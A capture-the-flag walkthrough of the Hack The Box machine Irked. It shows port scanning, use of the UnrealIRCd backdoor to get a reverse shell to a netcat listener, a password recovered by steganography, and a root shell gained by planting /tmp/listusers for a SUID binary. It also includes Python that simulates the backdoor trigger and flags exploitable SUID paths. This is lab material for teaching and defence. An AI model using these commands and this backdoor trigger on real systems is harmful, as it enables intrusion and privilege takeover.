Disclaimer
The hosts attacked in this article are legally authorized targets. The tools and techniques used here are for learning and exchange only. Please do not use the tools or attack ideas from this article for any illegal purpose. I am not responsible for any consequences arising from doing so, nor for any misuse or damage caused.
Service discovery
Let's see which ports the target has open:
┌──(root💀kali)-[~]
└─# nmap 10.10.10.117 --open -p-
Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-22 03:47 EST
Stats: 0:00:12 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 4.25% done; ETC: 03:52 (0:04:30 remaining)
Stats: 0:00:13 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 4.68% done; ETC: 03:52 (0:04:25 remaining)
Stats: 0:00:14 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 5.19% done; ETC: 03:52 (0:04:16 remaining)
Nmap scan report for 10.10.10.117
Host is up (0.31s latency).
Not shown: 65492 closed ports, 36 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
111/tcp   open  rpcbind
6697/tcp  open  ircs-u
8067/tcp  open  infi-async
38540/tcp open  unknown
65534/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 113.95 seconds
Get service and version details for these ports:
┌──(root💀kali)-[~/HTB/Irked]
└─# nmap -sV -A -O -Pn -p 22,80,111,6697,8067,38540,65534 10.10.10.117
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-22 03:52 EST
Nmap scan report for 10.10.10.117
Host is up.

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey:
|   1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA)
|   2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA)
|   256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA)
|_  256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (ED25519)
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Site doesn't have a title (text/html).
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          33839/udp   status
|   100024  1          38540/tcp   status
|   100024  1          49259/udp6  status
|_  100024  1          52644/tcp6  status
6697/tcp  open  irc     UnrealIRCd
8067/tcp  open  irc     UnrealIRCd
38540/tcp open  status  1 (RPC #100024)
65534/tcp open  irc     UnrealIRCd
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.12 (95%), Linux 3.13 (95%), Linux 3.16 (95%), Linux 3.18 (95%), Linux 3.2 - 4.9 (95%), Linux 3.8 - 3.11 (95%), Linux 4.8 (95%), Linux 4.4 (95%), Linux 4.2 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: irked.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 111/tcp)
HOP RTT       ADDRESS
1   310.44 ms 10.10.14.1
2   311.20 ms 10.10.10.117

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 40.39 seconds
Port 80 serves a single image with one line of text on the home page:
IRC is almost working!
Directory brute-forcing turns up nothing else, so the IRC service is the only place to start.
Wikipedia's description of IRC:
Internet Relay Chat (IRC) is an application-layer protocol. It is mainly used for group chat, but can also be used for one-to-one chat. IRC servers use port 6667 (plaintext, e.g. irc://irc.freenode.net), 6697 (SSL-encrypted, e.g. ircs://irc.freenode.net:6697), and others.
So it is a chat service. Try connecting to it with nc:
┌──(root💀kali)-[~/HTB/Irked]
└─# nc 10.10.10.117 6697
:irked.htb NOTICE AUTH :*** Looking up your hostname...
:irked.htb NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
10.10.14.3
:irked.htb 451 10.10.14.3 :You have not registered
The initial shell
A Google search for the service turns up the well-known backdoor in UnrealIRCd 3.2.8.1 (CVE-2010-2075), and there is an exploit for it on GitHub.
Change these two lines in the script to point at our listener:
local_ip = '10.10.14.3'   # CHANGE THIS
local_port = '4242'       # CHANGE THIS
Start a listener:
nc -lnvp 4242
Run the exploit:
┌──(root💀kali)-[~/HTB/Irked]
└─# python3 irc_exp.py 10.10.10.117 -payload python
Exploit sent successfully!
The reverse shell comes back on the listener:
┌──(root💀kali)-[~/HTB/Irked]
└─# nc -lnvp 4242
listening on [any] 4242 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.117] 55352
ircd@irked:~/Unreal3.2$ id
id
uid=1001(ircd) gid=1001(ircd) groups=1001(ircd)
ircd@irked:~/Unreal3.2$ whoami
whoami
ircd
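As an added example (not code from this write-up, nor from the GitHub exploit it uses), here is the pre-registration exchange seen in the nc session above together with the trigger format of the UnrealIRCd 3.2.8.1 backdoor (CVE-2010-2075), run against an in-process stand-in for the server over a socketpair so it works offline. The stand-in, its replies and the irked.htb/10.10.14.3 strings are constructed from the transcript; it records what the backdoor would have handed to system() instead of running it. detect_backdoor_trigger() is the corresponding defender check over captured client-to-server lines.

```python
import socket
import threading

# The trojaned read_packet() in UnrealIRCd 3.2.8.1 hands everything after
# this marker to system(), before any NICK/USER registration has happened.
BACKDOOR_PREFIX = b"AB;"


def backdoor_trigger(cmd):
    """Build the line that fires the backdoor for a shell command."""
    return BACKDOOR_PREFIX + cmd.encode() + b"\r\n"


def detect_backdoor_trigger(lines):
    """Defender side: from captured client->server IRC lines (pcap, ircd log),
    return the ones that start with the backdoor marker."""
    return [line for line in lines if line.startswith("AB;")]


def fake_unreal_server(conn, executed):
    """Constructed stand-in for a backdoored ircd: greets like the nc session,
    answers unregistered commands with 451, and appends (instead of running)
    anything sent with the backdoor prefix. Closes the connection on QUIT."""
    conn.sendall(b":irked.htb NOTICE AUTH :*** Looking up your hostname...\r\n"
                 b":irked.htb NOTICE AUTH :*** Couldn't resolve your hostname; "
                 b"using your IP address instead\r\n")
    buf = b""
    while True:
        data = conn.recv(4096)
        if not data:
            break
        buf += data
        while b"\n" in buf:
            line, buf = buf.split(b"\n", 1)
            line = line.rstrip(b"\r")
            if line.startswith(BACKDOOR_PREFIX):
                executed.append(line[len(BACKDOOR_PREFIX):].decode())
            elif line.upper().startswith(b"QUIT"):
                conn.close()
                return
            else:
                conn.sendall(b":irked.htb 451 10.10.14.3 :You have not registered\r\n")
    conn.close()


def irc_exchange(client_lines):
    """Client side over a socketpair: send the lines, read until the server
    closes, and return (server reply lines, commands the backdoor received)."""
    client, server = socket.socketpair()
    executed = []
    worker = threading.Thread(target=fake_unreal_server, args=(server, executed))
    worker.start()
    for line in client_lines:
        client.sendall(line)
    received = b""
    while True:
        chunk = client.recv(4096)
        if not chunk:
            break
        received += chunk
    client.close()
    worker.join()
    return [r for r in received.decode().split("\r\n") if r], executed


def demo():
    """Reproduce the transcript: an ordinary command before registration gets
    451, then the backdoor line would run `id` as the ircd user."""
    return irc_exchange([
        b"PING :irked\r\n",
        backdoor_trigger("id"),
        b"QUIT\r\n",
    ])


if __name__ == "__main__":
    replies, executed = demo()
    print("\n".join(replies))
    print("backdoor would have run:", executed)
    print("flagged:", detect_backdoor_trigger(["NICK foo", "AB;id", "USER a b c d"]))
```

Two points this makes visible: the backdoor needs no registration, so the 451 the server sends to an unregistered client is irrelevant to it, and the trigger is a fixed three-byte prefix at the start of a line, which is why a byte-match on "AB;" at offset zero of a client line is enough for detection on any of the three UnrealIRCd ports.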
user.txt is in the home directory of the user djmardov, and we do not have permission to read it.
Privilege escalation to djmardov
Next to it, in /home/djmardov/Documents, there is a hidden backup file:
ircd@irked:/home/djmardov/Documents$ cat .backup
cat .backup
Super elite steg backup pw
UPupDOWNdownLRlrBAbaSSss
It looks like it could be djmardov's password, but su to djmardov with it fails. The first line tells us what it really is:
Super elite steg backup pw
"Steg" is short for steganography, hiding information inside another file, usually an image. We know the home page on port 80 serves an image, so download it and use steghide with this passphrase to extract whatever is hidden in it:
┌──(root💀kali)-[~/HTB/Irked]
└─# steghide extract -sf <downloaded image>
Enter passphrase:
wrote extracted data to "pass.txt".
┌──(root💀kali)-[~/HTB/Irked]
└─# cat pass.txt
Kab6h+m+bbp2J:HG
The extracted pass.txt contains Kab6h+m+bbp2J:HG. That is djmardov's password, so switch user and read user.txt:
ircd@irked:/home/djmardov/Documents$ su djmardov
su djmardov
Password: Kab6h+m+bbp2J:HG
djmardov@irked:~/Documents$ cat user.txt
cat user.txt
Privilege escalation to root
Run LinPEAS and look at the SUID binaries:
═══════════════════════════╣ Interesting Files ╠═══════════════════════════
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid
strace Not Found
-rwsr-xr-- 1 root messagebus 355K Nov 21 2016 /usr/lib/dbus-1.0/dbus-daemon-launch-helper (Unknown SUID binary)
-rwsr-xr-x 1 root root 9.3K Mar 28 2017 /usr/lib/eject/dmcrypt-get-device (Unknown SUID binary)
-rwsr-xr-x 1 root root 14K Sep 8 2016 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 550K Nov 19 2017 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 14K Oct 14 2014 /usr/lib/spice-gtk/spice-client-glib-usb-acl-helper (Unknown SUID binary)
-rwsr-xr-x 1 root root 1.1M Feb 10 2018 /usr/sbin/exim4
-rwsr-xr-- 1 root dip 332K Apr 14 2015 /usr/sbin/pppd --> Apple_Mac_OSX_10.4.8(05-2007)
-rwsr-xr-x 1 root root 43K May 17 2017 /usr/bin/chsh (Unknown SUID binary)
-rwsr-sr-x 1 root mail 94K Nov 18 2017 /usr/bin/procmail
-rwsr-xr-x 1 root root 77K May 17 2017 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 38K May 17 2017 /usr/bin/newgrp --> HP-UX_10.20
-rwsr-sr-x 1 daemon daemon 50K Sep 30 2014 /usr/bin/at --> RTru64_UNIX_4.0g(CVE-2002-1614)
-rwsr-xr-x 1 root root 18K Sep 8 2016 /usr/bin/pkexec --> Linux4.10_to_5.1.17(CVE-2019-13272)/rhel_6(CVE-2011-1485)
-rwsr-sr-x 1 root root 9.3K Apr 1 2014 /usr/bin/X
-rwsr-xr-x 1 root root 52K May 17 2017 /usr/bin/passwd --> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 52K May 17 2017 /usr/bin/chfn --> SuSE_9.3/10
-rwsr-xr-x 1 root root 7.2K May 16 2018 /usr/bin/viewuser (Unknown SUID binary)
-rwsr-xr-x 1 root root 95K Aug 13 2014 /sbin/mount.nfs
-rwsr-xr-x 1 root root 38K May 17 2017 /bin/su
-rwsr-xr-x 1 root root 34K Mar 29 2015 /bin/mount --> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 34K Jan 21 2016 /bin/fusermount (Unknown SUID binary)
-rwsr-xr-x 1 root root 158K Jan 28 2017 /bin/ntfs-3g --> Debian9/8/7/Ubuntu/Gentoo/others/Ubuntu_Server_16.10_and_others(02-2017)
-rwsr-xr-x 1 root root 26K Mar 29 2015 /bin/umount --> BSD/Linux(08-1996)
One of these is not a standard system binary and looks suspicious: /usr/bin/viewuser
Look at it with strings:
djmardov@irked:/tmp$ strings /usr/bin/viewuser
/lib/ld-linux.so.2
libc.so.6
_IO_stdin_used
setuid
puts
system
__cxa_finalize
__libc_start_main
GLIBC_2.0
GLIBC_2.3
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
UWVS
[^_]
This application is being devleoped to set and test user permissions
It is still being actively developed
/tmp/listusers
The binary imports setuid and system and contains the path /tmp/listusers, so it calls setuid() and then runs /tmp/listusers through system(), as root because of the SUID bit.
/tmp/listusers does not exist, and /tmp is world-writable, so we can create it ourselves.
That makes this easy. Create the file:
touch /tmp/listusers
Write the command we want root to run into it:
echo "bash -p" > /tmp/listusers
Make it executable:
chmod +x listusers
Run the SUID binary to get a root shell:
djmardov@irked:/tmp$ /usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           2021-12-22 05:03 (:0)
djmardov  pts/1        2021-12-22 05:14 (10.10.14.3)
root@irked:/tmp# id
uid=0(root) gid=1000(djmardov) groups=1000(djmardov),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),110(lpadmin),113(scanner),117(bluetooth)
root@irked:/tmp# whoami
root
root@irked:/tmp# cat /root/root.txt
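As an added example (my own triage code, not part of this write-up or of LinPEAS), here is the check that turns the viewuser finding into something repeatable: take the strings(1) output of a SUID binary, pull out the absolute paths it embeds and the libc calls that make them dangerous, and classify each path by whether the current user could plant or replace it. VIEWUSER_STRINGS is a constructed copy of the listing above; the verdict strings and demo_plant_check() are mine. Note that os.access() answers for the calling user, so run this as the low-privileged user you are escalating from, not as root.

```python
import os
import re
import stat
import subprocess
import tempfile

# Lines in strings(1) output that look like absolute paths.
ABS_PATH = re.compile(r"^/[\w.+/-]+$")

# Constructed copy of the relevant `strings /usr/bin/viewuser` lines above.
VIEWUSER_STRINGS = """\
/lib/ld-linux.so.2
libc.so.6
_IO_stdin_used
setuid
puts
system
__libc_start_main
This application is being devleoped to set and test user permissions
It is still being actively developed
/tmp/listusers
"""


def strings_of(binary):
    """Run strings(1) on a binary on the target; same shape as the listing above."""
    return subprocess.run(["strings", binary], capture_output=True,
                          text=True, check=True).stdout


def referenced_paths(strings_output):
    """Absolute paths embedded in the binary (candidate exec/open targets)."""
    return [line for line in strings_output.splitlines() if ABS_PATH.match(line)]


def dangerous_imports(strings_output):
    """libc symbols that turn an embedded path into code execution as root:
    system()/exec*()/popen() run it, setuid()/setresuid() keep the privilege."""
    names = set(strings_output.splitlines())
    return sorted(names & {"system", "popen", "execl", "execlp", "execv",
                           "execvp", "setuid", "setresuid"})


def classify_path(path):
    """How the current user could hijack a path a root SUID binary executes."""
    parent = os.path.dirname(path) or "/"
    if not os.path.exists(path):
        if os.access(parent, os.W_OK):
            return "missing, parent writable: plant it and it runs as root"
        return "missing, parent not writable"
    if os.access(path, os.W_OK):
        return "exists and writable: overwrite it"
    # A root-owned file in a writable, non-sticky directory can be renamed
    # away and replaced even though the file itself is not writable.
    if os.access(parent, os.W_OK) and not (os.stat(parent).st_mode & stat.S_ISVTX):
        return "exists, parent writable and not sticky: replace it"
    return "ok"


def audit_strings(strings_output):
    """Triage one SUID binary from its strings output."""
    return {
        "imports": dangerous_imports(strings_output),
        "paths": {p: classify_path(p) for p in referenced_paths(strings_output)},
    }


def demo_plant_check():
    """Offline demonstration of classify_path() in a throwaway directory:
    the verdict for a missing file, then for the file once we have created it."""
    d = tempfile.mkdtemp()
    p = os.path.join(d, "listusers")
    before = classify_path(p)
    open(p, "w").close()
    after = classify_path(p)
    return before, after


if __name__ == "__main__":
    # Offline run against the constructed listing; on the box you would call
    # audit_strings(strings_of("/usr/bin/viewuser")) as djmardov.
    report = audit_strings(VIEWUSER_STRINGS)
    print("risky imports:", report["imports"])
    for path, verdict in report["paths"].items():
        print(f"{path}: {verdict}")
    print(demo_plant_check())
```

The combination that matters is setuid plus system together with a path under a directory anyone can write to; the fix on the defensive side is the mirror image, i.e. a SUID binary should never system() or exec a path it does not own the directory of, and ideally should not spawn a shell at all.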